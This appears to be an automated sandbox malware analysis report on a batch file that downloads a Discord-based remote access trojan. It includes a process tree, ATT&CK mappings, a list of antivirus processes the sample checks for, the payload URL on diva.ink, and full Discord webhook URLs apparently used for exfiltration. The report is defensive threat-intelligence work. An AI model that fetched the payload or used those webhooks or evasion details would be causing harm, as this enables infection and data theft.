        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: exe.exe.32.dr, Program.cs  .Net Code: DisableTaskManager
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A5115000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: bdagent.exe
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A5115000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: avp.exe
        Source: explorer.exe, 00000017.00000002.2716909048.000000000BBCE000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A5115000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: bdss.exe

        Stealing of Sensitive Information

        Source: Yara match  File source: C:\Users\Public\Documents\Secret Document\exe.exe, type: DROPPED

        Remote Access Functionality

        Source: Yara match  File source: C:\Users\Public\Documents\Secret Document\exe.exe, type: DROPPED
        MITRE ATT&CK matrix (a number in parentheses is the count of matched signatures for that technique):

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Scripting (11) | Valid Accounts | Windows Management Instrumentation (2) | Scripting (11) | Process Injection (12) | Masquerading (11) | OS Credential Dumping | Security Software Discovery (341) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | Command and Scripting Interpreter (11) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | PowerShell (2) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (151) | Security Account Manager | Virtualization/Sandbox Evasion (151) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (12) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (15) | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (1) | Cached Domain Credentials | System Information Discovery (42) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Timestomp (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | DLL Side-Loading (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        Behavior Graph ID: 1526626  Sample: main.bat.bin.bat  Startdate: 06/10/2024  Architecture: WINDOWS  Score: 100

        Contacted hosts: diva.ink; windowsupdatebg.s.llnwi.net; 5 other IPs or domains
        Sample-level signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Yara detected Discord Rat; 9 other signatures

        Process tree (as drawn in the behavior graph):
        cmd.exe 3 (started)
            signatures: Suspicious powershell command line found; Obfuscated command line found; Tries to download and execute files (via powershell)
            powershell.exe 22 (started)
                dropped: C:\Users\user\AppData\...\l1mwkpcb.cmdline, Unicode
                signatures: Powershell drops PE file
                explorer.exe (started)
                    signatures: Query firmware table information (likely to detect VMs)
                csc.exe 3 (started)
                    dropped: C:\Users\user\AppData\Local\...\l1mwkpcb.dll, PE32
                    cvtres.exe 1 (started)
            powershell.exe (started)
                network: diva.ink 185.199.108.153, 443, 64901 FASTLYUS Netherlands
                dropped: C:\Users\Public\Documents\...\exe.exe, PE32+
            powershell.exe 33 (started)
                signatures: Loading BitLocker PowerShell Module
            16 other processes (started)
                network: ptb.discord.com 162.159.128.233, 443, 64892, 64897 CLOUDFLARENETUS United States; discord.com 162.159.137.232, 443, 49707, 49710 CLOUDFLARENETUS United States; 127.0.0.1 unknown unknown
                net1.exe 1 (started)
        svchost.exe (started)



        Source | Detection | Scanner | Label | Link
        main.bat.bin.bat | 0% | ReversingLabs | |
        main.bat.bin.bat | 3% | Virustotal | | Browse

        Source | Detection | Scanner | Label | Link
        C:\Users\Public\Documents\Secret Document\exe.exe | 100% | Avira | TR/Agent.lsgui |
        C:\Users\Public\Documents\Secret Document\exe.exe | 100% | Joe Sandbox ML | |
        C:\Users\Public\Documents\Secret Document\exe.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.DiscordRAT |

        No Antivirus matches

        Source | Detection | Scanner | Label | Link
        bg.microsoft.map.fastly.net | 0% | Virustotal | | Browse
        ptb.discord.com | 1% | Virustotal | | Browse
        discord.com | 0% | Virustotal | | Browse
        windowsupdatebg.s.llnwi.net | 1% | Virustotal | | Browse
        api.msn.com | 0% | Virustotal | | Browse
        18.31.95.13.in-addr.arpa | 0% | Virustotal | | Browse

        Source | Detection | Scanner | Label | Link
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe |
        https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe |
        https://contoso.com/License | 0% | URL Reputation | safe |
        https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe |
        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
        https://contoso.com/ | 0% | URL Reputation | safe |
        https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
        https://oneget.orgX | 0% | URL Reputation | safe |
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
        http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe |
        https://go.micro | 0% | URL Reputation | safe |
        https://contoso.com/Icon | 0% | URL Reputation | safe |
        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
        https://aka.ms/pscore68 | 0% | URL Reputation | safe |
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | 0% | URL Reputation | safe |
        https://oneget.org | 0% | URL Reputation | safe |
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | 0% | Virustotal | | Browse
        http://ptb.discord.com | 1% | Virustotal | | Browse
        https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz | 0% | Virustotal | | Browse
        https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTz | 0% | Virustotal | | Browse
        https://ptb.discord.com/api/webhooks/12918514 | 0% | Virustotal | | Browse
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | 0% | Virustotal | | Browse
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
        ptb.discord.com | 162.159.128.233 | true | false | | unknown
        discord.com | 162.159.137.232 | true | false | | unknown
        diva.ink | 185.199.108.153 | true | true | | unknown
        windowsupdatebg.s.llnwi.net | 178.79.238.128 | true | false | | unknown
        18.31.95.13.in-addr.arpa | unknown | unknown | false | | unknown
        api.msn.com | unknown | unknown | false | | unknown
        Name | Malicious | Antivirus Detection | Reputation
        https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz | false | | unknown
        https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd | false | | unknown
        https://diva.ink/exe.exe | true | | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7Eu | csc.exe, 0000000A.00000003.1488501089.0000013616791000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1488254269.000001361678C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1488419687.000001361678C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000002.1488742165.0000013616792000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://ptb.disc | powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://ptb.discord.com | powershell.exe, 00000023.00000002.2398128595.000002D2C9A75000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2705476793.00000000052BA000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/License | powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/ | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://deff.nelreports.net/api/report?cat=msn | explorer.exe, 00000017.00000003.2304007048.0000000009148000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTz | curl.exe, 0000001C.00000002.2290720682.00000219E6A60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000002.2287844080.00000219E6780000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2673504080.000002D2E0716000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2386798148.000002D2C6330000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1 | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://ptb.discord.com/api/webhooks/12918514 | powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://ptb.discord.com/api/webhooks/1 | powershell.exe, 00000015.00000002.2166099676.0000025C19944000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://contoso.com/ | powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://nuget.org/nuget.exe | powershell.exe, 00000009.00000002.1519896951.00000269A3822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1519896951.00000269A36DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.00000247901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.000002479006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640E430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CC11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC10A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B38F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://oneget.orgX | powershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2004/09/enumera | svchost.exe, 00000019.00000002.2704265023.000001774DCC1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://api.msn.com/Io. | explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09 | explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
